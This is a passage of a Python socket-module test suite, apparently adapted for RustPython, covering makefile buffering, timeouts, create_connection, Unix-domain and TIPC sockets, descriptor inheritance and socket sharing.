self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
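    # Informal sketch (comments only) of the pattern the docstring above
    # describes and that http.client relies on; conn stands for any
    # connected stream socket.  With bufsize == 0 nothing is cached inside
    # the file object, so a second makefile() picks up exactly where the
    # first one stopped reading:
    #
    #     f1 = conn.makefile('rb', 0)
    #     line1 = f1.readline()    # e.g. the first request line
    #     f2 = conn.makefile('rb', 0)
    #     line2 = f2.readline()    # the next line, not swallowed by f1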
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
                    # write() returned None: the socket buffer is full
                    # (the write would block), which is the condition we
                    # wanted to reach.
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
        # create_connection() enumerates through all the addresses returned
        # and, if it doesn't successfully connect to any of them, it
        # propagates the last exception it encountered (a simplified sketch
        # of this loop appears right after this class).
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
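# A simplified sketch of the address enumeration that socket.create_connection()
# performs, as described in NetworkConnectionNoServer.test_create_connection()
# above.  It is illustrative only and never invoked by the test runner: each
# address returned by getaddrinfo() is tried in turn, and the last error is
# re-raised if none of them accepts a connection.
def _create_connection_sketch(host, port, timeout=None):
    last_exc = None
    for family, type_, proto, _, sockaddr in socket.getaddrinfo(
            host, port, 0, socket.SOCK_STREAM):
        sock = None
        try:
            sock = socket.socket(family, type_, proto)
            if timeout is not None:
                sock.settimeout(timeout)
            sock.connect(sockaddr)
            return sock
        except OSError as exc:
            last_exc = exc
            if sock is not None:
                sock.close()
    if last_exc is not None:
        raise last_exc
    raise OSError("getaddrinfo() returned an empty list")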
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
# TODO: RUSTPYTHON, surrogateescape
@unittest.expectedFailure
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
            # It's ok if the file does not exist, is a directory, or if we
            # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
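    # Informal summary of the mapping exercised above (see the comments in
    # checkNonblock()):
    #
    #   settimeout(None) / setblocking(True)  -> getblocking() True,  fd blocking
    #   settimeout(0)    / setblocking(False) -> getblocking() False, fd non-blocking
    #   settimeout(t), t > 0                  -> getblocking() True,  fd non-blocking
    #                                            (timeout enforced via select())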
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
@unittest.skip("TODO: RUSTPYTHON, socket sharing")
class TestSocketSharing(SocketTCPTest):
    # This must be a classmethod and not a staticmethod or multiprocessing
    # won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
